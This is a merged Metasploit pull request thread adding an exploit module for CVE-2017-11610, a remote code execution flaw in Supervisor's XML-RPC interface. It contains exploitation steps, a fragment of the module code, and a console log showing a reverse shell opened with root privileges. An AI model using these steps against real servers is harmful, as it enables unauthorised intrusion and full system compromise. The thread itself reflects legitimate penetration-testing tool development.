### PR TITLE
Add exploit module for CVE-2017-11610 - Authenticated RCE in Supervisor

### PR DESCRIPTION
**Pull request by chutchut**
This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2. This has been tested with versions 3.2.0 and 3.3.2

### VM - Xubuntu 16.04
Linux xubuntu-vbx 4.4.0-92-generic #115-Ubuntu SMP Thu Aug 10 09:04:33 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

### Supervisor
Version 3.2.0-2ubuntu0.1 via `sudo apt-get install supervisor`

### Enable Web interface/XML-RPC server in Supervisor config
```
[inet_http_server]         ; inet (TCP) server disabled by default
port=:9001        ; ip_address:port specifier, *:port for all iface
username=user              ; default is no username (open server)
password=123               ; default is no password (open server)
```

## Verification

  1. ```msf > use exploit/linux/http/supervisor_xmlrpc_exec```
  2. ```msf > set lhost 192.168.0.2```
  3. ```msf > set rhost 192.168.0.19```
  4. ```msf > set httpusername user```
  5. ```msf > set httppassword 123```
  6. ```msf > exploit```
  7. A meterpreter session should have been opened successfully

### CODE REVIEW

**Comment by chutchut** [comment]
Want me to squash these commits?

**Comment by bwatters-r7** [comment]
Welcome, @chutchut!  No worries on the commits.  I kind of like to see the thought process, but different people react differently. One thing I would ask is that you run Rubocop against this code.   It helps us maintain a _relatively_ consistent syntax and helps everyone learn the changing face of Ruby.

If you are a little lost on Rubocop, there is documentation on using Rubocop in framework here: https://github.com/rapid7/metasploit-framework/wiki/Using-Rubocop

If you still have questions, please feel free to ask here!

File: modules/exploits/linux/http/supervisor_xmlrpc_exec.rb [hunk 1]
```diff
@@ -0,0 +1,172 @@
...
+    }
+    if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
+      print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
+      params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
+    end
+    res = send_request_cgi(params)
+
+    if res
+      if res.code == 200
+        match = res.body.match(/<span>((\d+)\.([\dab]+)(\.(\d+))?)<\/span>/)
```
Comment (bwatters-r7) [inline modules/exploits/linux/http/supervisor_xmlrpc_exec.rb]: Check out the ruby version class: http://ruby-doc.org/stdlib-2.0.0/libdoc/rubygems/rdoc/Gem/Version.html
Also: https://stackoverflow.com/questions/2051229/how-to-compare-versions-in-ruby

**Comment by chutchut** [comment]
Hey thanks for the welcome @bwatters-r7! Sorry just seen you comments I'll get on them ASAP

**Comment by h00die** [comment]
@chutchut any timeline on getting the version fixed up?  Should only take a few minutes to do.  If @bwatters-r7 doesn't get to this over the weekend, I may give it a shot.

**Comment by bwatters-r7** [comment]
@h00die, I'm not going to get to look at it this weekend.  If you have time, please feel free!

**Comment by h00die** [comment]
Worked for me!
```
msf > use exploit/linux/http/supervisor_xmlrpc_exec 
msf exploit(supervisor_xmlrpc_exec) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(supervisor_xmlrpc_exec) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf exploit(supervisor_xmlrpc_exec) > set httpusername super
httpusername => super
msf exploit(supervisor_xmlrpc_exec) > set httppassword visor
httppassword => visor
msf exploit(supervisor_xmlrpc_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2.2 
[*] Sending XML-RPC payload via POST to 1.1.1.1:9001/RPC2
[*] Using basic auth (super:visor)
[*] Sending stage (2878936 bytes) to 1.1.1.1
[*] Command Stager progress - 100.00% done (782/782 bytes)
[+] Request returned without status code, usually indicates success. Passing to handler..
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:47208) at 2017-09-23 08:44:14 -0400
[+] negotiating tlv encryption


[+] negotiated tlv encryption
meterpreter > [+] negotiated tlv encryption
meterpreter > getpid
Current pid: 1128
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 1.1.1.1
OS           : Ubuntu 16.04 (Linux 4.4.0-96-generic)
Architecture : x64
Meterpreter  : x64/linux
```

**Comment by h00die** [comment]
There are a few minor cleanups here, but instead of playing the back and forth game i'll submit you a PR to your branch in a little bit. accept it, it'll auto update THIS PR, then i'll merge it to the framework.

**Comment by h00die** [comment]
well, looks like i screwed that up and commited directly to your repo instead of sending a PR.  my apologies. these changes worked for me and i re-exploited, and docs looked good. can you verify its good on your end before i merge @chutchut ?

**Comment by chutchut** [comment]
Hey @h00die I was going to get on it this weekend, but you beat me to it! :) Sorry for the delay and thanks for your edits, appreciate it. All looks good my end, I've re-tested on my setup and its still exploitable, so happy to merge whenever. Thanks!

**Comment by h00die** [comment]
# Release Notes
This module adds an RCE exploit for supervisor via XMLRPC interface for CVE-2017-11610.

**Comment by h00die** [comment]
@chutchut thanks for the submission, just landed it.  Good job on your first submission!

**Pull request merged**